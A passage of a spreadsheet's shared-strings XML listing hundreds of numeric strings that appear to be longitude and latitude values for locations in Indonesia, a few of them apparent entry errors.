    <t>111.53835296</t>
  </si>
  <si>
    <t>111.44459903</t>
  </si>
  <si>
    <t>992.7249490</t>
  </si>
  <si>
    <t>113.95629280</t>
  </si>
  <si>
    <t>104.24196010</t>
  </si>
  <si>
    <t>113.95819902</t>
  </si>
  <si>
    <t>110.59338927</t>
  </si>
  <si>
    <t>110.58892675</t>
  </si>
  <si>
    <t>110.61223984</t>
  </si>
  <si>
    <t>110.87571859</t>
  </si>
  <si>
    <t>110.88252455</t>
  </si>
  <si>
    <t>110.40478706</t>
  </si>
  <si>
    <t>112.72634520</t>
  </si>
  <si>
    <t>111.48960114</t>
  </si>
  <si>
    <t>111.48758796</t>
  </si>
  <si>
    <t>111.55981064</t>
  </si>
  <si>
    <t>111.55981600</t>
  </si>
  <si>
    <t>111.49688601</t>
  </si>
  <si>
    <t>111.55980527</t>
  </si>
  <si>
    <t>111.48971915</t>
  </si>
  <si>
    <t>111.48675137</t>
  </si>
  <si>
    <t>111.50295391</t>
  </si>
  <si>
    <t>100.65733373</t>
  </si>
  <si>
    <t>112.65232801</t>
  </si>
  <si>
    <t>106.46672013</t>
  </si>
  <si>
    <t>106.46790340</t>
  </si>
  <si>
    <t>106.47755742</t>
  </si>
  <si>
    <t>106.73772243</t>
  </si>
  <si>
    <t>106.46640437</t>
  </si>
  <si>
    <t>106.73624586</t>
  </si>
  <si>
    <t>106.72952771</t>
  </si>
  <si>
    <t>106.72340155</t>
  </si>
  <si>
    <t>110.06149650</t>
  </si>
  <si>
    <t>110.11133194</t>
  </si>
  <si>
    <t>110.2467030</t>
  </si>
  <si>
    <t>112.6535296</t>
  </si>
  <si>
    <t>115.4275024</t>
  </si>
  <si>
    <t>107.7481207</t>
  </si>
  <si>
    <t>110.1070511</t>
  </si>
  <si>
    <t>110.0649190</t>
  </si>
  <si>
    <t>110.2482319</t>
  </si>
  <si>
    <t>103.1485400</t>
  </si>
  <si>
    <t>117.7031153</t>
  </si>
  <si>
    <t>110.4246722</t>
  </si>
  <si>
    <t>109.3178916</t>
  </si>
  <si>
    <t>112.9222924</t>
  </si>
  <si>
    <t>112.9220027</t>
  </si>
  <si>
    <t>953.303647</t>
  </si>
  <si>
    <t>112.9222711</t>
  </si>
  <si>
    <t>116.1123411</t>
  </si>
  <si>
    <t>114.7122364</t>
  </si>
  <si>
    <t>115.1861980</t>
  </si>
  <si>
    <t>119.4413424</t>
  </si>
  <si>
    <t>119.5728350</t>
  </si>
  <si>
    <t>119.5467251</t>
  </si>
  <si>
    <t>119.4894612</t>
  </si>
  <si>
    <t>119.4525647</t>
  </si>
  <si>
    <t>119.5798325</t>
  </si>
  <si>
    <t>119.5571242</t>
  </si>
  <si>
    <t>119.5348432</t>
  </si>
  <si>
    <t>116.0710502</t>
  </si>
  <si>
    <t>119.4680786</t>
  </si>
  <si>
    <t>119.5647693</t>
  </si>
  <si>
    <t>106.3956356</t>
  </si>
  <si>
    <t>116.8683743</t>
  </si>
  <si>
    <t>122.5282860</t>
  </si>
  <si>
    <t>110.4195960</t>
  </si>
  <si>
    <t>112.9806842</t>
  </si>
  <si>
    <t>105.2152454</t>
  </si>
  <si>
    <t>106.8348718</t>
  </si>
  <si>
    <t>107.7237527</t>
  </si>
  <si>
    <t>107.7238117</t>
  </si>
  <si>
    <t>119.4461060</t>
  </si>
  <si>
    <t>119.8828983</t>
  </si>
  <si>
    <t>119.4430161</t>
  </si>
  <si>
    <t>119.9484086</t>
  </si>
  <si>
    <t>121.1491489</t>
  </si>
  <si>
    <t>114.8466110</t>
  </si>
  <si>
    <t>114.8418617</t>
  </si>
  <si>
    <t>115.0941038</t>
  </si>
  <si>
    <t>114.9534702</t>
  </si>
  <si>
    <t>114.8378491</t>
  </si>
  <si>
    <t>114.9163055</t>
  </si>
  <si>
    <t>116.0847610</t>
  </si>
  <si>
    <t>114.7229290</t>
  </si>
  <si>
    <t>114.8449194</t>
  </si>
  <si>
    <t>114.8408675</t>
  </si>
  <si>
    <t>114.8343945</t>
  </si>
  <si>
    <t>114.8352349</t>
  </si>
  <si>
    <t>117.2172120</t>
  </si>
  <si>
    <t>117.1762162</t>
  </si>
  <si>
    <t>114.7314155</t>
  </si>
  <si>
    <t>114.7313619</t>
  </si>
  <si>
    <t>115.1632126</t>
  </si>
  <si>
    <t>116.9960046</t>
  </si>
  <si>
    <t>106.9133881</t>
  </si>
  <si>
    <t>115.0906401</t>
  </si>
  <si>
    <t>987.555885</t>
  </si>
  <si>
    <t>114.8748922</t>
  </si>
  <si>
    <t>119.6390757</t>
  </si>
  <si>
    <t>114.8677646</t>
  </si>
  <si>
    <t>106.7247802</t>
  </si>
  <si>
    <t>106.6728044</t>
  </si>
  <si>
    <t>106.8248829</t>
  </si>
  <si>
    <t>106.6798854</t>
  </si>
  <si>
    <t>106.8445984</t>
  </si>
  <si>
    <t>106.7702812</t>
  </si>
  <si>
    <t>106.6697145</t>
  </si>
  <si>
    <t>106.8706810</t>
  </si>
  <si>
    <t>106.6299775</t>
  </si>
  <si>
    <t>106.6334912</t>
  </si>
  <si>
    <t>112.7310167</t>
  </si>
  <si>
    <t>104.7808002</t>
  </si>
  <si>
    <t>107.8495100</t>
  </si>
  <si>
    <t>106.8303283</t>
  </si>
  <si>
    <t>104.5729749</t>
  </si>
  <si>
    <t>106.8032670</t>
  </si>
  <si>
    <t>108.5122170</t>
  </si>
  <si>
    <t>107.9361971</t>
  </si>
  <si>
    <t>104.9159950</t>
  </si>
  <si>
    <t>728.132629</t>
  </si>
  <si>
    <t>976.080537</t>
  </si>
  <si>
    <t>117.6558708</t>
  </si>
  <si>
    <t>117.6655040</t>
  </si>
  <si>
    <t>106.8276215</t>
  </si>
  <si>
    <t>108.6955703</t>
  </si>
  <si>
    <t>106.9163134</t>
  </si>
  <si>
    <t>115.1423004</t>
  </si>
  <si>
    <t>-6.16978</t>
  </si>
  <si>
    <t>-6.17944</t>
  </si>
  <si>
    <t>-6.23449</t>
  </si>
  <si>
    <t>-6.30170</t>
  </si>
  <si>
    <t>-6.16859</t>
  </si>
  <si>
    <t>-6.19933</t>
  </si>
  <si>
    <t>-6.18996</t>
  </si>
  <si>
    <t>-6.19439</t>
  </si>
  <si>
    <t>-6.16777</t>
  </si>
  <si>
    <t>-6.18322</t>
  </si>
  <si>
    <t>-6.16204</t>
  </si>
  <si>
    <t>-6.23895</t>
  </si>
  <si>
    <t>-6.20840</t>
  </si>
  <si>
    <t>-6.22251</t>
  </si>
  <si>
    <t>-6.25791</t>
  </si>
  <si>
    <t>-6.24017</t>
  </si>
  <si>
    <t>-6.26413</t>
  </si>
  <si>
    <t>-6.16994</t>
  </si>
  <si>
    <t>-6.23027</t>
  </si>
  <si>
    <t>-6.16260</t>
  </si>
  <si>
    <t>-6.18362</t>
  </si>
  <si>
    <t>-6.26131</t>
  </si>
  <si>
    <t>-6.26202</t>
  </si>
  <si>
    <t>-6.22893</t>
  </si>
  <si>
    <t>-6.20248</t>
  </si>
  <si>
    <t>-6.39824</t>
  </si>
  <si>
    <t>-6.25710</t>
  </si>
  <si>
    <t>-6.25988</t>
  </si>
  <si>
    <t>-6.24377</t>
  </si>
  <si>
    <t>-6.26009</t>
  </si>
  <si>
    <t>-6.26040</t>
  </si>
  <si>
    <t>-6.34131</t>
  </si>
  <si>
    <t>-6.24023</t>
  </si>
  <si>
    <t>-6.23683</t>
  </si>
  <si>
    <t>-6.31471</t>
  </si>
  <si>
    <t>-6.15970</t>
  </si>
  <si>
    <t>-6.21766</t>
  </si>
  <si>
    <t>-6.34358</t>
  </si>
  <si>
    <t>-6.18715</t>
  </si>
  <si>
    <t>-6.22795</t>
  </si>
  <si>
    <t>-6.34129</t>
  </si>
  <si>
    <t>-6.17003</t>
  </si>
  <si>
    <t>-6.17684</t>
  </si>
  <si>
    <t>-6.26902</t>
  </si>
  <si>
    <t>-6.26173</t>
  </si>
  <si>
    <t>-6.23493</t>
  </si>
  <si>
    <t>-6.16707</t>
  </si>
  <si>
    <t>-6.23831</t>
  </si>
  <si>
    <t>-6.27237</t>
  </si>
  <si>
    <t>-6.16131</t>
  </si>
  <si>
    <t>-6.15914</t>
  </si>
  <si>
    <t>-6.18212</t>
  </si>
  <si>
    <t>-6.29700</t>
  </si>
  <si>
    <t>-6.21563</t>
  </si>
  <si>
    <t>-6.21562</t>
  </si>
  <si>
    <t>-6.26490</t>
  </si>
  <si>
    <t>-6.31112</t>
  </si>
  <si>
    <t>-6.30194</t>
  </si>
  <si>
    <t>-6.16380</t>
  </si>
  <si>
    <t>-6.16397</t>
  </si>
  <si>
    <t>-6.17746</t>
  </si>
  <si>
    <t>-6.14984</t>
  </si>
  <si>
    <t>-6.26556</t>
  </si>
  <si>
    <t>-6.24914</t>
  </si>
  <si>
    <t>-6.16438</t>
  </si>
  <si>
    <t>-6.24458</t>
  </si>
  <si>
    <t>-6.16350</t>
  </si>
  <si>
    <t>-6.32633</t>
  </si>
  <si>
    <t>-6.17703</t>
  </si>
  <si>
    <t>-6.26261</t>
  </si>
  <si>
    <t>-6.25797</t>
  </si>
  <si>
    <t>-6.17977</t>
  </si>
  <si>
    <t>-6.17535</t>
  </si>
  <si>
    <t>-6.16376</t>
  </si>
  <si>
    <t>-6.21783</t>
  </si>
  <si>
    <t>-6.17960</t>
  </si>
  <si>
    <t>-6.32787</t>
  </si>
  <si>
    <t>-6.34066</t>
  </si>
  <si>
    <t>-6.23830</t>
  </si>
  <si>
    <t>-6.19925</t>
  </si>
  <si>
    <t>-6.16456</t>
  </si>
  <si>
    <t>-6.29501</t>
  </si>
  <si>
    <t>-6.31031</t>
  </si>
  <si>
    <t>-6.22667</t>
  </si>
  <si>
    <t>-6.26968</t>
  </si>
  <si>
    <t>-6.30571</t>
  </si>
  <si>
    <t>-6.26655</t>
  </si>
  <si>
    <t>-6.20862</t>
  </si>
  <si>
    <t>-6.15691</t>
  </si>
  <si>
    <t>-6.15854</t>
  </si>
  <si>
    <t>-6.18720</t>
  </si>
  <si>
    <t>-6.16827</t>
  </si>
  <si>
    <t>-6.26652</t>
  </si>
  <si>
    <t>-6.13803</t>
  </si>
  <si>
    <t>-6.24717</t>
  </si>
  <si>
    <t>-6.20854</t>
  </si>
  <si>
    <t>-6.27878</t>
  </si>
  <si>
    <t>-6.18806</t>
  </si>
  <si>
    <t>-6.13735</t>
  </si>
  <si>
    <t>-6.32592</t>
  </si>
  <si>
    <t>-6.17334</t>
  </si>
  <si>
    <t>-6.16929</t>
  </si>
  <si>
    <t>-6.17469</t>
  </si>
  <si>
    <t>-6.13383</t>
  </si>
  <si>
    <t>-6.22796</t>
  </si>
  <si>
    <t>-6.17297</t>
  </si>
  <si>
    <t>-6.24634</t>
  </si>
  <si>
    <t>-6.13313</t>
  </si>
  <si>
    <t>-6.16471</t>
  </si>
  <si>
    <t>-6.17528</t>
  </si>
  <si>
    <t>-6.14387</t>
  </si>
  <si>
    <t>-6.16415</t>
  </si>
  <si>
    <t>-6.16835</t>
  </si>
  <si>
    <t>-6.17605</t>
  </si>
  <si>
    <t>-6.16372</t>
  </si>
  <si>
    <t>-6.17387</t>
  </si>
  <si>
    <t>-6.17510</t>
  </si>
  <si>
    <t>-6.22745</t>
  </si>
  <si>
    <t>-6.17184</t>
  </si>
  <si>
    <t>-6.22820</t>
  </si>
  <si>
    <t>-6.13045</t>
  </si>
  <si>
    <t>-6.19054</t>
  </si>
  <si>
    <t>-6.18292</t>
  </si>
  <si>
    <t>-6.18548</t>
  </si>
  <si>
    <t>-6.19692</t>
  </si>
  <si>
    <t>-6.16285</t>
  </si>
  <si>
    <t>-6.16528</t>
  </si>
  <si>
    <t>-6.23262</t>
  </si>
  <si>
    <t>-6.23458</t>
  </si>
  <si>
    <t>-6.23850</t>
  </si>
  <si>
    <t>-6.13149</t>
  </si>
  <si>
    <t>-6.16466</t>
  </si>
  <si>
    <t>-6.16973</t>
  </si>
  <si>
    <t>-6.16817</t>
  </si>
  <si>
    <t>-6.16584</t>
  </si>
  <si>
    <t>-6.14460</t>
  </si>
  <si>
    <t>-6.15520</t>
  </si>
  <si>
    <t>-6.16893</t>
  </si>
  <si>
    <t>-6.22224</t>
  </si>
  <si>
    <t>-6.22228</t>
  </si>
  <si>
    <t>-6.17531</t>
  </si>
  <si>
    <t>-6.13315</t>
  </si>
  <si>
    <t>-6.24118</t>
  </si>
  <si>
    <t>-6.14728</t>
  </si>
  <si>
    <t>-6.15994</t>
  </si>
  <si>
    <t>-6.14458</t>
  </si>
  <si>
    <t>-6.13859</t>
  </si>
  <si>
    <t>-6.24350</t>
  </si>
  <si>
    <t>-6.15927</t>
  </si>
  <si>
    <t>-6.17060</t>
  </si>
  <si>
    <t>-6.22485</t>
  </si>
  <si>
    <t>-6.21445</t>
  </si>
  <si>
    <t>-6.13795</t>
  </si>
  <si>
    <t>-6.19510</t>
  </si>
  <si>
    <t>-6.28748</t>
  </si>
  <si>
    <t>-6.18488</t>
  </si>
  <si>
    <t>-6.13108</t>
  </si>
  <si>
    <t>-6.13375</t>
  </si>
  <si>
    <t>-6.13109</t>
  </si>
  <si>
    <t>-6.16782</t>
  </si>
  <si>
    <t>-6.17440</t>
  </si>
  <si>
    <t>-6.22195</t>
  </si>
  <si>
    <t>-6.13057</t>
  </si>
  <si>
    <t>-6.13805</t>
  </si>
  <si>
    <t>-6.17038</t>
  </si>
  <si>
    <t>-6.17729</t>
  </si>
  <si>
    <t>-6.17112</t>
  </si>
  <si>
    <t>-6.16897</t>
  </si>
  <si>
    <t>-6.17522</t>
  </si>
  <si>
    <t>-6.19997</t>
  </si>
  <si>
    <t>-6.17088</t>
  </si>
  <si>
    <t>-6.17236</t>
  </si>
  <si>
    <t>-6.23094</t>
  </si>
  <si>
    <t>-6.17377</t>
  </si>
  <si>
    <t>-6.16985</t>
  </si>
  <si>
    <t>-6.19499</t>
  </si>
  <si>
    <t>-6.16408</t>
  </si>
  <si>
    <t>-6.10422</t>
  </si>
  <si>
    <t>-6.18482</t>
  </si>
  <si>
    <t>-6.17726</t>
  </si>
  <si>
    <t>-6.16907</t>
  </si>
  <si>
    <t>-6.24327</t>
  </si>
  <si>
    <t>-6.14132</t>
  </si>
  <si>
    <t>-6.16453</t>
  </si>
  <si>
    <t>-6.16329</t>
  </si>
  <si>
    <t>-6.21376</t>
  </si>
  <si>
    <t>-6.15130</t>
  </si>
  <si>
    <t>-6.15125</t>
  </si>
  <si>
    <t>-6.16040</t>
  </si>
  <si>
    <t>-6.29039</t>
  </si>
  <si>
    <t>-6.63305</t>
  </si>
  <si>
    <t>-6.22878</t>
  </si>
  <si>
    <t>-6.16357</t>
  </si>
  <si>
    <t>-6.13316</t>
  </si>
  <si>
    <t>-6.16879</t>
  </si>
  <si>
    <t>-6.21483</t>
  </si>
  <si>
    <t>-6.24595</t>
  </si>
  <si>
    <t>-6.13695</t>
  </si>
  <si>
    <t>-6.13790</t>
  </si>
  <si>
    <t>-6.15457</t>
  </si>
  <si>
    <t>-6.29091</t>
  </si>
  <si>
    <t>-6.16385</t>
  </si>
  <si>
    <t>-6.16746</t>
  </si>
  <si>
    <t>-6.16626</t>
  </si>
  <si>
    <t>-6.23843</t>
  </si>
  <si>
    <t>-6.17291</t>
  </si>
  <si>
    <t>-6.23472</t>
  </si>
  <si>
    <t>-6.16435</t>
  </si>
  <si>
    <t>-6.16189</t>
  </si>
  <si>
    <t>-6.17457</t>
  </si>
  <si>
    <t>-6.19044</t>
  </si>
  <si>
    <t>-6.18646</t>
  </si>
  <si>
    <t>-6.21733</t>
  </si>
  <si>
    <t>-6.17768</t>
  </si>
  <si>
    <t>-6.16712</t>
  </si>
  <si>
    <t>-6.17892</t>
  </si>
  <si>
    <t>-6.23844</t>
  </si>
  <si>
    <t>-6.18005</t>
  </si>
  <si>
    <t>-6.21009</t>
  </si>
  <si>
    <t>-7.55802</t>
  </si>
  <si>
    <t>-6.18047</t>
  </si>
  <si>
    <t>-6.17150</t>
  </si>
  <si>
    <t>-6.16840</t>
  </si>
  <si>
    <t>-6.16577</t>
  </si>
  <si>
    <t>-6.19909</t>
  </si>
  <si>
    <t>-6.14470</t>
  </si>
  <si>
    <t>-6.17042</t>
  </si>
  <si>
    <t>-6.31195</t>
  </si>
  <si>
    <t>-6.13030</t>
  </si>
  <si>
    <t>-6.13826</t>
  </si>
  <si>
    <t>-6.13843</t>
  </si>
  <si>
    <t>-6.17153</t>
  </si>
  <si>
    <t>-6.13312</t>
  </si>
  <si>
    <t>-6.13700</t>
  </si>
  <si>
    <t>-6.14137</t>
  </si>
  <si>
    <t>-6.16237</t>
  </si>
  <si>
    <t>-6.39746</t>
  </si>
  <si>
    <t>-6.06818</t>
  </si>
  <si>
    <t>-6.13247</t>
  </si>
  <si>
    <t>-7.60912</t>
  </si>
  <si>
    <t>-6.26089</t>
  </si>
  <si>
    <t>-6.13862</t>
  </si>
  <si>
    <t>-6.13678</t>
  </si>
  <si>
    <t>-6.25864</t>
  </si>
  <si>
    <t>-6.16310</t>
  </si>
  <si>
    <t>-6.16946</t>
  </si>
  <si>
    <t>-6.16695</t>
  </si>
  <si>
    <t>-6.16044</t>
  </si>
  <si>
    <t>-6.25392</t>
  </si>
  <si>
    <t>-6.34176</t>
  </si>
  <si>
    <t>-6.15666</t>
  </si>
  <si>
    <t>-6.26267</t>
  </si>
  <si>
    <t>-6.21280</t>
  </si>
  <si>
    <t>-6.23637</t>
  </si>
  <si>
    <t>-6.32665</t>
  </si>
  <si>
    <t>-6.16405</t>
  </si>
  <si>
    <t>-6.31413</t>
  </si>
  <si>
    <t>-6.21758</t>
  </si>
  <si>
    <t>-1.27847</t>
  </si>
  <si>
    <t>-6.24144</t>
  </si>
  <si>
    <t>-6.17552</t>
  </si>
  <si>
    <t>-6.17803</t>
  </si>
  <si>
    <t>-6.17429</t>
  </si>
  <si>
    <t>-7.05685</t>
  </si>
  <si>
    <t>-6.18632</t>
  </si>
  <si>
    <t>-7.27240</t>
  </si>
  <si>
    <t>-6.25424</t>
  </si>
  <si>
    <t>-6.16059</t>
  </si>
  <si>
    <t>-6.95509</t>
  </si>
  <si>
    <t>-7.26759</t>
  </si>
  <si>
    <t>-6.23397</t>
  </si>
  <si>
    <t>-6.27153</t>
  </si>
  <si>
    <t>-6.15592</t>
  </si>
  <si>
    <t>-7.10064</t>
  </si>
  <si>
    <t>-7.12569</t>
  </si>
  <si>
    <t>-7.09186</t>
  </si>
  <si>
    <t>-6.24466</t>
  </si>
  <si>
    <t>-7.25213</t>
  </si>
  <si>
    <t>-6.95615</t>
  </si>
  <si>
    <t>-3.64608</t>
  </si>
  <si>
    <t>-6.96941</t>
  </si>
  <si>
    <t>-6.19371</t>
  </si>
  <si>
    <t>-6.19333</t>
  </si>
  <si>
    <t>-6.19338</t>
  </si>
  <si>
    <t>-6.90308</t>
  </si>
  <si>
    <t>-6.27344</t>
  </si>
  <si>
    <t>-6.94644</t>
  </si>
  <si>
    <t>-6.95782</t>
  </si>
  <si>
    <t>-6.21940</t>
  </si>
  <si>
    <t>-6.22847</t>
  </si>
  <si>
    <t>-6.15906</t>
  </si>
  <si>
    <t>-6.21164</t>
  </si>
  <si>
    <t>-6.21495</t>
  </si>
  <si>
    <t>-6.24871</t>
  </si>
  <si>
    <t>-6.18783</t>
  </si>
  <si>
    <t>-6.23574</t>
  </si>
  <si>
    <t>-6.14177</t>
  </si>
  <si>
    <t>-6.16611</t>
  </si>
  <si>
    <t>-6.20254</t>
  </si>
  <si>
    <t>-6.33617</t>
  </si>
  <si>
    <t>-7.27244</t>
  </si>
  <si>
    <t>-6.15213</t>
  </si>
  <si>
    <t>-6.11565</t>
  </si>
  <si>
    <t>-6.13511</t>
  </si>
  <si>
    <t>-6.13372</t>
  </si>
  <si>
    <t>-6.13642</t>
  </si>
  <si>
    <t>-6.17798</t>
  </si>
  <si>
    <t>-6.15585</t>
  </si>
  <si>
    <t>-6.14267</t>
  </si>
  <si>
    <t>-6.18265</t>
  </si>
  <si>
    <t>-6.14524</t>
  </si>
  <si>
    <t>-6.14531</t>
  </si>
  <si>
    <t>-6.23494</t>
  </si>
  <si>
    <t>-6.13378</t>
  </si>
  <si>
    <t>-6.09583</t>
  </si>
  <si>
    <t>-6.13670</t>
  </si>
  <si>
    <t>-6.17789</t>
  </si>
  <si>
    <t>-6.21966</t>
  </si>
  <si>
    <t>-6.14109</t>
  </si>
  <si>
    <t>-6.24452</t>
  </si>
  <si>
    <t>-6.33219</t>
  </si>
  <si>
    <t>-6.15269</t>
  </si>
  <si>
    <t>-6.15537</t>
  </si>
  <si>
    <t>-6.18139</t>
  </si>
  <si>
    <t>-6.15091</t>
  </si>
  <si>
    <t>-6.21073</t>
  </si>
  <si>
    <t>-6.24572</t>
  </si>
  <si>
    <t>-6.14747</t>
  </si>
  <si>
    <t>-6.15808</t>
  </si>
  <si>
    <t>-6.12338</t>
  </si>
  <si>
    <t>-6.12341</t>
  </si>
  <si>
    <t>-6.11010</t>
  </si>
  <si>
    <t>-6.13455</t>
  </si>
  <si>
    <t>-6.23889</t>
  </si>
  <si>
    <t>-6.17502</t>
  </si>
  <si>
    <t>-6.14591</t>
  </si>
  <si>
    <t>-6.10755</t>
  </si>
  <si>
    <t>-6.23181</t>
  </si>
  <si>
    <t>-6.23857</t>
  </si>
  <si>
    <t>-6.08947</t>
  </si>
  <si>
    <t>-6.99115</t>
  </si>
  <si>
    <t>-6.23916</t>
  </si>
  <si>
    <t>-6.14846</t>
  </si>
  <si>
    <t>-6.09605</t>
  </si>
  <si>
    <t>-6.11852</t>
  </si>
  <si>
    <t>-6.15279</t>
  </si>
  <si>
    <t>-6.15543</t>
  </si>
  <si>
    <t>-6.12701</t>
  </si>
  <si>
    <t>-6.20885</t>
  </si>
  <si>
    <t>-6.22898</t>
  </si>
  <si>
    <t>-6.09339</t>
  </si>
  <si>
    <t>-6.98646</t>
  </si>
  <si>
    <t>-6.15081</t>
  </si>
  <si>
    <t>-6.24140</t>
  </si>
  <si>
    <t>-6.96352</t>
  </si>
  <si>
    <t>-6.99101</t>
  </si>
  <si>
    <t>-6.98010</t>
  </si>
  <si>
    <t>-6.98127</t>
  </si>
  <si>
    <t>-6.35725</t>
  </si>
  <si>
    <t>-6.35414</t>
  </si>
  <si>
    <t>-6.34430</t>
  </si>
  <si>
    <t>-6.30855</t>
  </si>
  <si>
    <t>-6.34829</t>
  </si>
  <si>
    <t>-6.98624</t>
  </si>
  <si>
    <t>-6.30041</t>
  </si>
  <si>
    <t>-6.34668</t>
  </si>
  <si>
    <t>-6.31904</t>
  </si>
  <si>
    <t>-6.97167</t>
  </si>
  <si>
    <t>-6.25414</t>
  </si>
  <si>
    <t>-7.75357</t>
  </si>
  <si>
    <t>-6.98306</t>
  </si>
  <si>
    <t>-7.36519</t>
  </si>
  <si>
    <t>-6.23171</t>
  </si>
  <si>
    <t>-6.23208</t>
  </si>
  <si>
    <t>-6.17248</t>
  </si>
  <si>
    <t>-7.27332</t>
  </si>
  <si>
    <t>-7.32074</t>
  </si>
  <si>
    <t>-7.29564</t>
  </si>
  <si>
    <t>-6.91688</t>
  </si>
  <si>
    <t>-7.27397</t>
  </si>
  <si>
    <t>-7.58538</t>
  </si>
  <si>
    <t>-7.29546</t>
  </si>
  <si>
    <t>-7.29316</t>
  </si>
  <si>
    <t>-7.29691</t>
  </si>
  <si>
    <t>-7.30585</t>
  </si>
  <si>
    <t>-7.30631</t>
  </si>
  <si>
    <t>-7.35355</t>
  </si>
  <si>
    <t>-7.31707</t>
  </si>
  <si>
    <t>-7.29644</t>
  </si>
  <si>
    <t>-7.28526</t>
  </si>
  <si>
    <t>-7.28000</t>
  </si>
  <si>
    <t>-7.30616</t>
  </si>
  <si>
    <t>-7.29128</t>
  </si>
  <si>
    <t>-7.30560</t>
  </si>
  <si>
    <t>-7.31736</t>
  </si>
  <si>
    <t>-7.30339</t>
  </si>
  <si>
    <t>-6.15669</t>
  </si>
  <si>
    <t>-6.14892</t>
  </si>
  <si>
    <t>-7.26003</t>
  </si>
  <si>
    <t>-6.09733</t>
  </si>
  <si>
    <t>-7.26865</t>
  </si>
  <si>
    <t>-7.25750</t>
  </si>
  <si>
    <t>-6.11354</t>
  </si>
  <si>
    <t>-7.60434</t>
  </si>
  <si>
    <t>-7.60490</t>
  </si>
  <si>
    <t>-6.13381</t>
  </si>
  <si>
    <t>-6.14110</t>
  </si>
  <si>
    <t>-6.14500</t>
  </si>
  <si>
    <t>-6.15993</t>
  </si>
  <si>
    <t>-6.27374</t>
  </si>
  <si>
    <t>-6.13964</t>
  </si>
  <si>
    <t>-6.13571</t>
  </si>
  <si>
    <t>-6.13143</t>
  </si>
  <si>
    <t>-6.15420</t>
  </si>
  <si>
    <t>-6.16342</t>
  </si>
  <si>
    <t>-6.15802</t>
  </si>
  <si>
    <t>-6.18534</t>
  </si>
  <si>
    <t>-6.17700</t>
  </si>
  <si>
    <t>-6.14205</t>
  </si>
  <si>
    <t>-6.17770</t>
  </si>
  <si>
    <t>-7.55574</t>
  </si>
  <si>
    <t>-6.12320</t>
  </si>
  <si>
    <t>-6.31601</t>
  </si>
  <si>
    <t>-7.45344</t>
  </si>
  <si>
    <t>-7.27476</t>
  </si>
  <si>
    <t>-5.65025</t>
  </si>
  <si>
    <t>-6.34904</t>
  </si>
  <si>
    <t>-6.21281</t>
  </si>
  <si>
    <t>-6.17264</t>
  </si>
  <si>
    <t>-6.17603</t>
  </si>
  <si>
    <t>-6.16756</t>
  </si>
  <si>
    <t>-6.34316</t>
  </si>
  <si>
    <t>-6.33565</t>
  </si>
  <si>
    <t>-6.33578</t>
  </si>
  <si>
    <t>-6.97279</t>
  </si>
  <si>
    <t>-6.95856</t>
  </si>
  <si>
    <t>-6.10817</t>
  </si>
  <si>
    <t>-7.32717</t>
  </si>
  <si>
    <t>-6.91825</t>
  </si>
  <si>
    <t>-6.25254</t>
  </si>
  <si>
    <t>-6.45461</t>
  </si>
  <si>
    <t>-8.61927</t>
  </si>
  <si>
    <t>-6.19322</t>
  </si>
  <si>
    <t>-6.95728</t>
  </si>
  <si>
    <t>-6.97746</t>
  </si>
  <si>
    <t>-6.97952</t>
  </si>
  <si>
    <t>-6.94389</t>
  </si>
  <si>
    <t>-6.95732</t>
  </si>
  <si>
    <t>-6.26081</t>
  </si>
  <si>
    <t>-6.16252</t>
  </si>
  <si>
    <t>-6.23988</t>
  </si>
  <si>
    <t>-6.22144</t>
  </si>
  <si>
    <t>-6.17280</t>
  </si>
  <si>
    <t>-6.15136</t>
  </si>
  <si>
    <t>-6.23416</t>
  </si>
  <si>
    <t>-6.16451</t>
  </si>
  <si>
    <t>-6.21360</t>
  </si>
  <si>
    <t>-6.24611</t>
  </si>
  <si>
    <t>-6.13814</t>
  </si>
  <si>
    <t>-6.15686</t>
  </si>
  <si>
    <t>-6.18075</t>
  </si>
  <si>
    <t>-6.27385</t>
  </si>
  <si>
    <t>-6.15803</t>
  </si>
  <si>
    <t>-6.11512</t>
  </si>
  <si>
    <t>-6.27378</t>
  </si>
  <si>
    <t>-6.20243</t>
  </si>
  <si>
    <t>-6.16068</t>
  </si>
  <si>
    <t>-6.18743</t>
  </si>
  <si>
    <t>-6.26665</t>
  </si>
  <si>
    <t>-6.15617</t>
  </si>
  <si>
    <t>-6.15211</t>
  </si>
  <si>
    <t>-6.14667</t>
  </si>
  <si>
    <t>-6.15930</t>
  </si>
  <si>
    <t>-6.17652</t>
  </si>
  <si>
    <t>-6.16952</t>
  </si>
  <si>
    <t>-6.24745</t>
  </si>
  <si>
    <t>-6.16774</t>
  </si>
  <si>
    <t>-6.17945</t>
  </si>
  <si>
    <t>-6.17019</t>
  </si>
  <si>
    <t>-6.25405</t>
  </si>
  <si>
    <t>-6.15703</t>
  </si>
  <si>
    <t>-6.16447</t>
  </si>
  <si>
    <t>-6.26603</t>
  </si>
  <si>
    <t>-6.16872</t>
  </si>
  <si>
    <t>-6.17916</t>
  </si>
  <si>
    <t>-6.20513</t>
  </si>
  <si>
    <t>-6.23158</t>
  </si>
  <si>
    <t>-6.16768</t>
  </si>
  <si>
    <t>-6.13984</t>
  </si>
  <si>
    <t>-6.17533</t>
  </si>
  <si>
    <t>-6.17256</t>
  </si>
  <si>
    <t>-6.17295</t>
  </si>
  <si>
    <t>-6.16998</t>
  </si>
  <si>
    <t>-6.15223</t>
  </si>
  <si>
    <t>-6.16041</t>
  </si>
  <si>
    <t>-6.15373</t>
  </si>
  <si>
    <t>-6.13671</t>
  </si>
  <si>
    <t>-6.33482</t>
  </si>
  <si>
    <t>-6.18069</t>
  </si>
  <si>
    <t>-6.26388</t>
  </si>
  <si>
    <t>-6.15339</t>
  </si>
  <si>
    <t>-6.14211</t>
  </si>
  <si>
    <t>-6.26494</t>
  </si>
  <si>
    <t>-6.18001</t>
  </si>
  <si>
    <t>-6.26197</t>
  </si>
  <si>
    <t>-6.13091</t>
  </si>
  <si>
    <t>-6.17678</t>
  </si>
  <si>
    <t>-6.15496</t>
  </si>
  <si>
    <t>-6.15337</t>
  </si>
  <si>
    <t>-6.20976</t>
  </si>
  <si>
    <t>-6.15641</t>
  </si>
  <si>
    <t>-6.15416</t>
  </si>
  <si>
    <t>-6.15321</t>
  </si>
  <si>
    <t>-6.19758</t>
  </si>
  <si>
    <t>-6.14824</t>
  </si>
  <si>
    <t>-6.27009</t>
  </si>
  <si>
    <t>-6.14590</t>
  </si>
  <si>
    <t>-6.14777</t>
  </si>
  <si>
    <t>-6.15858</t>
  </si>
  <si>
    <t>-6.15022</t>
  </si>
  <si>
    <t>-6.15341</t>
  </si>
  <si>
    <t>-6.15605</t>
  </si>
  <si>
    <t>-6.17938</t>
  </si>
  <si>
    <t>-6.24457</t>
  </si>
  <si>
